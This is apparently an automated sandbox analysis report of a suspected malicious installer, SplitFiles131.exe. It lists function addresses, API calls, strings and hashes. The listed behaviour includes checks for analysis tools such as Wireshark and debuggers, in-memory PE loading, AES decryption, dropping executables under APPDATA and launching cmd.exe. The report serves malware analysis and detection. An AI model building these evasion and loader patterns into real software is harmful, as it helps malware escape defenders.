Instruction Fuzzy Hash: 6701F7B1F4532069F73085126C45B7B568C8B82B64F64013BF940A63C0D6D89C04E2AE

Uniqueness

Uniqueness Score: -1.00%

Function 0046D068 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00406FE4: 6CAD5F60.KERNEL32(00000000,0048D628,0048B356,00000000,0048B3AB,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406FEF

6CAD6060.KERNEL32(00000000,00000000,00000001,004AE064,?,0046D676,?,00000000,0046D705,?,00000000,0046D908,?,00000000,0046D962), ref: 0046D0C6

Part of subcall function 0046CF18: GetLastError.KERNEL32(00000000,0046D004,?,?,?,004AE048,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0046D08B,00000001), ref: 0046CF39

Strings

DeleteFile, xrefs: 0046D07F
MoveFile, xrefs: 0046D0A1

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: D6060ErrorLast
String ID: DeleteFile$MoveFile
API String ID: 581812409-139070271
Opcode ID: 3286add737261da9596020d0779331a5a2dead55cbf0c9684a5df42f0ff127d7
Instruction ID: 86e1435b28abd71ebb250fdb3f6b7c45ff8f6c329ae4cfdc01409c1855dba219
Opcode Fuzzy Hash: 3286add737261da9596020d0779331a5a2dead55cbf0c9684a5df42f0ff127d7
Instruction Fuzzy Hash: 5BF0AF60E0411066DE14BB6A8542A5A33888F0239DF10417FF9906F3C3EA2E9C0682AF

Uniqueness

Uniqueness Score: -1.00%

Function 0044E09C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 0044DD4C: InvalidateRect.USER32(00000000,00000001,00000001), ref: 0044DDC2

NotifyWinEvent.USER32(0000800A,00000000,000000FC,?), ref: 0044E0F2

Strings

`,v, xrefs: 0044E0D4, 0044E0F2
FD, xrefs: 0044E0A5, 0044E0B7, 0044E0C7, 0044E0E1

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: EventInvalidateNotifyRect
String ID: FD$`,v
API String ID: 4137399111-3926226564
Opcode ID: 868f51c89105054003320aea82aadd4cb8c344df814fcc8ff0cc142b6db144a2
Instruction ID: e76815fa4295d63e633f3cb5cd5ab01292fbb66bdbdbaac571db2888ea7d0737
Opcode Fuzzy Hash: 868f51c89105054003320aea82aadd4cb8c344df814fcc8ff0cc142b6db144a2
Instruction Fuzzy Hash: A5F0F030701624AFE311DF1DC88988EBFE4EF08361B008186F8588B361C7B4DE40CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00402850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,AUTOMATION,00000001,00000000,00431610,00000000,00431666,?,?,004313FC,00000001,00000000,00000000), ref: 0040286D
GetCommandLineA.KERNEL32(AUTOMATION,00000001,00000000,00431610,00000000,00431666,?,?,004313FC,00000001,00000000,00000000,?,0043209C), ref: 0040287F

Strings

AUTOMATION, xrefs: 00402852

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CommandFileLineModuleName
String ID: AUTOMATION
API String ID: 2151003578-3270279633
Opcode ID: 68efeb646be0e363d0f0ae53914f55a7e0e3c363f158dbac0d7dd3307158ec53
Instruction ID: daee7366679174b5276f86a0a27228b54be5a9370ddee46f5c897b3a8adc4376
Opcode Fuzzy Hash: 68efeb646be0e363d0f0ae53914f55a7e0e3c363f158dbac0d7dd3307158ec53
Instruction Fuzzy Hash: C5F0E52B70061227D22071AE098576B21CD8BC4754F18423BB648F73C0EEFCCC41429F

Uniqueness

Uniqueness Score: -1.00%

Function 004027EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32(00000000,i,?,AUTOMATION,004313FC,00000001,00000000,?,004315FB,00000000,00431666,?,?,004313FC,00000001,00000000), ref: 00402802

Strings

AUTOMATION, xrefs: 004027F3
i, xrefs: 004027F7

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CommandLine
String ID: AUTOMATION$i
API String ID: 3253501508-2573797198
Opcode ID: ae67477c744024a6e7c2ac692df6760e5d4b638f78726258859dcd5773796150
Instruction ID: 1d02eac51ef4009498f5db1f058e76f7186e7b059260ff6a50aebf8a4045dc95
Opcode Fuzzy Hash: ae67477c744024a6e7c2ac692df6760e5d4b638f78726258859dcd5773796150
Instruction Fuzzy Hash: D0F0E23A200208AFD711EA61CE06A5A76ACEB49704FA18476B800B31D1D2FC1E04C198

Uniqueness

Uniqueness Score: -1.00%

Function 00453E18 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?), ref: 00453E37
Sleep.KERNEL32(?), ref: 00453E47
GetLastError.KERNEL32 ref: 00453E5A
GetLastError.KERNEL32 ref: 00453E64

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: a67b913468619f692699f25cfc5b73161d32ff8f76a631e4438fbb84d4302c51
Instruction ID: 07c7f71cbc58125a37242bf32ec339fedd4e6aab040e1fd147ef6d31c3ced231
Opcode Fuzzy Hash: a67b913468619f692699f25cfc5b73161d32ff8f76a631e4438fbb84d4302c51
Instruction Fuzzy Hash: CCF09032A04714669A20A9AB888796FB2DCDBA53A7710412BFC04D7203C538DE4946A9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: SplitFiles131.exePID: 4360, Parent PID: 6048COMMON

Execution Graph

Execution Coverage:	7.5%
Dynamic/Decrypted Code Coverage:	0.6%
Signature Coverage:	8.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	25

Executed Functions

Function 00402F20 Relevance: 37.3, APIs: 11, Strings: 10, Instructions: 504
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetLastError.KERNEL32(0000000D,?), ref: 00402F46
SetLastError.KERNEL32(000000C1), ref: 00402F88

Strings

Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FE8
Size is not valid!, xrefs: 00402F4C
DOS header size is not valid!, xrefs: 00402FB9
v+@, xrefs: 00402F93, 00402FCB, 00402F5E
DOS header is not valid!, xrefs: 00402F76
FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FFA
alignedImageSize != AlignValueUp!, xrefs: 00403069
Section alignment invalid!, xrefs: 0040300C
ERROR_OUTOFMEMORY!, xrefs: 0040309F
@, xrefs: 00402F3F

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID: @$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!$v+@
API String ID: 1452528299-3666885587
Opcode ID: ce0b6ba3c7f08ce00cb437c0cd81f476a8ad27299f5e07271d5d503724786e68
Instruction ID: ee8b362cb5bcb5acb02f75210dba8d77fdcb81ba509aa6813b7c3456fb0d570c
Opcode Fuzzy Hash: ce0b6ba3c7f08ce00cb437c0cd81f476a8ad27299f5e07271d5d503724786e68
Instruction Fuzzy Hash: 92128C71A012159BCB14CFA9D981BADBBB5FF48305F14416AE809AB3C1D7B8ED41CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004056A0 Relevance: 35.5, APIs: 11, Strings: 9, Instructions: 514
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Init_thread_footer.LIBCMT ref: 0040575F

Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2

__Init_thread_footer.LIBCMT ref: 0040592E
GetUserNameA.ADVAPI32(?,}FOF@.), ref: 004059C6
GetUserNameA.ADVAPI32(?,OJCG@.), ref: 00405803

Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90

__Init_thread_footer.LIBCMT ref: 00405B0B
GetUserNameA.ADVAPI32(?,lK@MF.), ref: 00405BC6
GetForegroundWindow.USER32(?,?), ref: 00405C9F
GetWindowTextA.USER32 ref: 00405CB2
Sleep.KERNEL32(00000258), ref: 00405DE2
GetForegroundWindow.USER32 ref: 00405DE4
GetWindowTextA.USER32 ref: 00405DF7

Strings

ZK]Z, xrefs: 00405AA4
OJCG@., xrefs: 00405738
debug, xrefs: 00405DCB
Wireshark, xrefs: 00405D3E
roxifier, xrefs: 00405D06
dbg, xrefs: 00405DB3
Far , xrefs: 00405CE3, 00405E28
NetworkMiner, xrefs: 00405D5A
HTTP Analyzer, xrefs: 00405D22

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: CriticalSectionWindow$Init_thread_footerNameUser$EnterForegroundLeaveText$ConditionSleepVariableWake
String ID: Far $HTTP Analyzer$NetworkMiner$OJCG@.$Wireshark$ZK]Z$dbg$debug$roxifier
API String ID: 3399126515-619935782
Opcode ID: 31dd46c91be120cfb9063c524cf2d76983dc327de586dcfc4b038ca48fcf9a12
Instruction ID: 074b258c6d59ddac17b90d1b3a787091faffede02681fa5b6702e06cb24e023a
Opcode Fuzzy Hash: 31dd46c91be120cfb9063c524cf2d76983dc327de586dcfc4b038ca48fcf9a12
Instruction Fuzzy Hash: 2F1225719002988ADB29DF24DC49BDE7B74EB46308F1041FAD448672D2DB7D9B89CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00406800 Relevance: 26.1, APIs: 8, Strings: 6, Instructions: 1614sleepCOMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(0040813E,00000000,DCBD048B,?), ref: 0040684F
GetLastError.KERNEL32 ref: 00406859
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,DCBD048B,?,00000000), ref: 00406B37
__Init_thread_footer.LIBCMT ref: 00406F6C
Sleep.KERNEL32(?,DCBD048B), ref: 00408D5F

Part of subcall function 00402980: Concurrency::cancel_current_task.LIBCPMT ref: 00402AD3

__Init_thread_footer.LIBCMT ref: 0040746E
__Init_thread_footer.LIBCMT ref: 00407928

Strings

)<, xrefs: 00408E12
OCjO, xrefs: 004073F1
\AI\, xrefs: 004073E7
.exe, xrefs: 004068BF, 00406D2E, 0040724C, 0040773C, 00407C1C
APPDATA, xrefs: 00406B63
KC^., xrefs: 004078D7

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: Init_thread_footer$Concurrency::cancel_current_taskCreateDirectoryErrorFolderLastPathSleep
String ID: .exe$APPDATA$KC^.$OCjO$\AI\$)<
API String ID: 1816155683-548552080
Opcode ID: 139fb17deca05b2c8f1ec0f17ad5d96a8aaffc1ce760a88e4899f3a611e21d42
Instruction ID: 0be4c55f84660d75167a20acadb567ab38b5d4c0f6123eba4fa82a51dea9132a
Opcode Fuzzy Hash: 139fb17deca05b2c8f1ec0f17ad5d96a8aaffc1ce760a88e4899f3a611e21d42
Instruction Fuzzy Hash: 02E21570A002549BEB19DB28CD447DDBB71AF46308F1082EED449BB3D2DB799AC4CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00403770 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 232
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,DCBD048B), ref: 004037F0
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403814
_mbstowcs.LIBCMT ref: 00403867
CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 0040387E
GetLastError.KERNEL32 ref: 00403888
CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 004038B0
GetLastError.KERNEL32 ref: 004038BA
CryptReleaseContext.ADVAPI32(?,00000000), ref: 004038CA
CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 0040398C
CryptDestroyKey.ADVAPI32(?), ref: 004039FE
___std_exception_copy.LIBVCRUNTIME ref: 00403A7E

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 004037CC, 00403A63

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease___std_exception_copy_mbstowcs
String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 4265767208-63410773
Opcode ID: cf61a024e7b059b9c70e00f8277d4a847d871fa60616db5b4861065f2fd07a60
Instruction ID: d958dc93e540a12c37dba8d87c44a8e8f394457365b2a07e5a0a794f231eaf70
Opcode Fuzzy Hash: cf61a024e7b059b9c70e00f8277d4a847d871fa60616db5b4861065f2fd07a60
Instruction Fuzzy Hash: 2881A071B00228AFEB209F25CC41B9ABBB9FF45304F4081AAF54DE7281DB759E858F55

Uniqueness

Uniqueness Score: -1.00%

Function 00406AA0 Relevance: 20.6, APIs: 6, Strings: 5, Instructions: 1319COMMON

Download Yara Rule

APIs

Part of subcall function 004065E0: GetCurrentProcess.KERNEL32(00000008,?), ref: 00406603
Part of subcall function 004065E0: OpenProcessToken.ADVAPI32(00000000), ref: 0040660A
Part of subcall function 004065E0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,0000004C,?), ref: 00406623
Part of subcall function 004065E0: CloseHandle.KERNEL32(?), ref: 00406630

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,DCBD048B,?,00000000), ref: 00406B37
__Init_thread_footer.LIBCMT ref: 00407ED3

Strings

\AI\, xrefs: 00408365
)<, xrefs: 00408E12
KC^., xrefs: 00408887
OCjO, xrefs: 0040836F
.exe, xrefs: 004068BF, 00406D2E, 0040724C, 0040773C, 00407C1C, 004081AD, 004086BC, 00408BCC

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ProcessToken$CloseCurrentFolderHandleInformationInit_thread_footerOpenPath
String ID: .exe$KC^.$OCjO$\AI\$)<
API String ID: 3622068345-3793718068
Opcode ID: 86dc44fb994b6dd9415c0bf608af7ba4a3155d101221ce84dd0fc1e0b537eb51
Instruction ID: f3a4c0b65de27d6511d17ec44510e10968ea22a81531b86e1dbf32cc3aae07d1
Opcode Fuzzy Hash: 86dc44fb994b6dd9415c0bf608af7ba4a3155d101221ce84dd0fc1e0b537eb51
Instruction Fuzzy Hash: 87C21570A002588BEB25DB24CE447DDBB71AF56308F1042EED4497B2D2DB799B88CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00404490 Relevance: 19.9, APIs: 7, Strings: 4, Instructions: 644
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNEL32(?,?,00000000), ref: 0040456D
FindNextFileA.KERNEL32(00000000,?,00000000,00000000,?,?), ref: 0040464A
FindClose.KERNEL32(00000000), ref: 00404655
__Init_thread_footer.LIBCMT ref: 004048E5
__Init_thread_footer.LIBCMT ref: 00404A83

Strings

\Desktop, xrefs: 004049EB
mmBK, xrefs: 00404A2C
O@K\, xrefs: 00404A33
{}k|, xrefs: 00404884

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: Find$FileInit_thread_footer$CloseFirstNext
String ID: O@K\$\Desktop$mmBK${}k|
API String ID: 3881311970-1521651405
Opcode ID: d9421b108587b5a130981a1a46fc69ea932a04d5d0a11459e9c69e0c5028e75c
Instruction ID: d59c19dc1825489004b71b5d951f6ac136d4c15861c1c7f922f70877673123c4
Opcode Fuzzy Hash: d9421b108587b5a130981a1a46fc69ea932a04d5d0a11459e9c69e0c5028e75c
Instruction Fuzzy Hash: 503267B1D002448BDB14DF68DC457AEBBB1EF86304F14427EE9007B2D2D7B9A985CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004096F0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 599
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00418873: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0040953A,00000000), ref: 00418886
Part of subcall function 00418873: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004188B7

__Init_thread_footer.LIBCMT ref: 004099CE
__Init_thread_footer.LIBCMT ref: 00409B05
__Init_thread_footer.LIBCMT ref: 00409BE7
Sleep.KERNEL32(?,00450F1C,00450F1D,?,?,?), ref: 00409DB9
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00409E7D
Concurrency::cancel_current_task.LIBCPMT ref: 00409EE3
Concurrency::cancel_current_task.LIBCPMT ref: 00409EE8

Part of subcall function 004018B0: ___std_exception_copy.LIBVCRUNTIME ref: 004018EE

Part of subcall function 004054C0: GetCurrentProcessId.KERNEL32(DCBD048B), ref: 004054EC
Part of subcall function 004054C0: GetCurrentProcessId.KERNEL32 ref: 00405508
Part of subcall function 004054C0: ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,00000000,00000000,00000000), ref: 004055A4

Part of subcall function 00409500: CreateThread.KERNEL32 ref: 004095FE
Part of subcall function 00409500: Sleep.KERNEL32(00000BB8), ref: 00409609

__Init_thread_footer.LIBCMT ref: 00409FC2

Strings

ZK]Z, xrefs: 00409FA5
MFE., xrefs: 00409AC6
D@, xrefs: 00409E73

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: Init_thread_footer$Concurrency::cancel_current_taskCurrentProcessSleepTime$CreateExecuteFileIos_base_dtorShellSystemThreadUnothrow_t@std@@@___std_exception_copy__ehfuncinfo$??2@std::ios_base::_
String ID: D@$MFE.$ZK]Z
API String ID: 3757312541-2629744079
Opcode ID: b499e81cc4c506dded1d2c4d08b53a0bff9c3602162d9189c5fe44090b093fcb
Instruction ID: 09b12323e8cf1ccab507edc46462649b34e9962f34bdcbd7157f6d7b385d370e
Opcode Fuzzy Hash: b499e81cc4c506dded1d2c4d08b53a0bff9c3602162d9189c5fe44090b093fcb
Instruction Fuzzy Hash: B232E0759002488BDB24DF68D845BEEB7B0AF45308F1441BAE805773D3D779AE88CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00405F40 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 389
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Init_thread_footer.LIBCMT ref: 00405FE0

Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2

__Init_thread_footer.LIBCMT ref: 004061D5
GetForegroundWindow.USER32 ref: 00406276
GetWindowTextA.USER32 ref: 00406291
__Init_thread_footer.LIBCMT ref: 00406323
__Init_thread_footer.LIBCMT ref: 004060D6

Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90

__Init_thread_footer.LIBCMT ref: 00406437

Strings

yG\K, xrefs: 004063CD
fOMEK\YG\K]FO\E., xrefs: 004062E3
~\AM, xrefs: 0040629E
E., xrefs: 0040617F

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: Init_thread_footer$CriticalSection$EnterLeaveWindow$ConditionForegroundTextVariableWake
String ID: E.$fOMEK\YG\K]FO\E.$yG\K$~\AM
API String ID: 1590647277-3754284071
Opcode ID: bc234d3f8a5cc926224b41c12a7a08888321062f72d41a8dac0ac9900901a028
Instruction ID: e9c2673cefaa3185768bab40f11baeefcd31a664600fc35e2933cd877b2fe628
Opcode Fuzzy Hash: bc234d3f8a5cc926224b41c12a7a08888321062f72d41a8dac0ac9900901a028
Instruction Fuzzy Hash: 7EF107799003848ADB35DB34EC067EA7B70AB05319F1405FED8492A2D3D7F99A98CB4D

Uniqueness

Uniqueness Score: -1.00%

Function 00402BF0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 113
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?,00000000,?,?,?,00403426), ref: 00402C98
GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,00403426), ref: 00402CAD
FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,00403426), ref: 00402CBB
LocalAlloc.KERNEL32(00000040,?,?,?,00403426), ref: 00402CD6
OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,00403426), ref: 00402CF5
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00403426), ref: 00402D02
LocalFree.KERNEL32(?,?,?,?,?,?,?,00403426), ref: 00402D07

Strings

&4@, xrefs: 00402C50, 00402D09
Error protecting memory page, xrefs: 00402CE1
%s: %s, xrefs: 00402CE6
0Zhv, xrefs: 00402CF5

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
String ID: %s: %s$&4@$0Zhv$Error protecting memory page
API String ID: 839691724-196108988
Opcode ID: f7e83cb46c05e663735d1022c7d68b0119dfbf9cc7d77a07b31833e59155f675
Instruction ID: 56ecb5147128ac6811eeaed226ebfad5a34a2763694ba038d08261f378adde64
Opcode Fuzzy Hash: f7e83cb46c05e663735d1022c7d68b0119dfbf9cc7d77a07b31833e59155f675
Instruction Fuzzy Hash: D6312531B00114AFE714AF69DC44FAEB769EF45300F1401AAE901AB2D1CAB5AD02CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404840 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90

__Init_thread_footer.LIBCMT ref: 004048E5

Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2

__Init_thread_footer.LIBCMT ref: 00404A83
__Init_thread_footer.LIBCMT ref: 00404B6A
__Init_thread_footer.LIBCMT ref: 00404C3A

Strings

\Desktop, xrefs: 004049EB
mmBK, xrefs: 00404A2C
O@K\, xrefs: 00404A33
{}k|, xrefs: 00404884

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

